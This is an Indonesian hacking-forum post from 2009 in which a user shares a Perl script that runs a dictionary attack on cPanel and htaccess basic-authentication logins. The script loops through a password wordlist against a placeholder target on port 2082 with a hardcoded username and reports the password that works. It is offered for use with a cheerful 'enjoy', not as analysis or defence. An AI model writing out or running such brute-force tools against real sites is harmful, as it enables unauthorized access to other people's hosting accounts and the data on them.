Devilzc0de TeaM
Would you like to react to this message? Create an account in a few clicks or log in to continue.


We Are DevilzCrew
 
IndeksLatest imagesPendaftaranLogin

 

 Simple htaccess & cpanel dict attack by sh3llc0der

Go down 
PengirimMessage
sh3llc0der
Pengunjung
Pengunjung



Jumlah posting : 8
Join date : 13.07.09

Simple htaccess & cpanel dict attack by sh3llc0der Empty
PostSubyek: Simple htaccess & cpanel dict attack by sh3llc0der   Simple htaccess & cpanel dict attack by sh3llc0der EmptyMon Jul 13, 2009 1:02 pm

# simple htaccess & cpanel dictionary attack
# coding by: sh3llc0der

sori ga make argv lg males
jadi monggo diedit ndiri: password.txt
ma : situstarget.com:2082
ma: usernya_taroh_sini
(ntu mua harus diedit)

Code:

#!/usr/bin/perl -w
# simple htaccess & cpanel dictionary attack
# coding by: sh3llc0der
use IO::Socket; 
use Socket;
use Net::hostent;
use LWP::UserAgent;
use HTTP::Response;
$i=1;
$daftarbrutus = "password.txt";
open("daftarbrutus") or die("Could not open wordlists!!!");
print "\n Guessing cpanel login of leqhi:\n";
print "-----------------------------------------\n";
foreach $line (<daftarbrutus>) {
  chomp($line);
  $ua = new LWP::UserAgent;
  my $req = HTTP::Headers->new;
  $req = HTTP::Request->new(GET => 'http://situstarget.com:2082');
  $req->authorization_basic("usernya_taroh_sini", $line);
  print "\nTesting pass:\n".$line."\n";
  $hasil=$ua->request($req)->as_string;
  if($hasil=~m/Login Attempt Failed!/)
    {
      print "[".$i."]login failed using pass:".$line."\n";
    }
    else
    {
      print "[".$i."]login succes using pass:".$line."\n";
    exit();
    }
  $i=$i+1;

}

enjoy Twisted Evil
Kembali Ke Atas Go down
 
Simple htaccess & cpanel dict attack by sh3llc0der
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» somple htaccess & cpanel dict attack | coding by sh3llc0der
» Koleksi Exploit, Shellc0de,Remote Exploit, BD, clean logs buat attack

Permissions in this forum:Anda tidak dapat menjawab topik
Devilzc0de TeaM :: Pemrograman :: Perl-
Navigasi: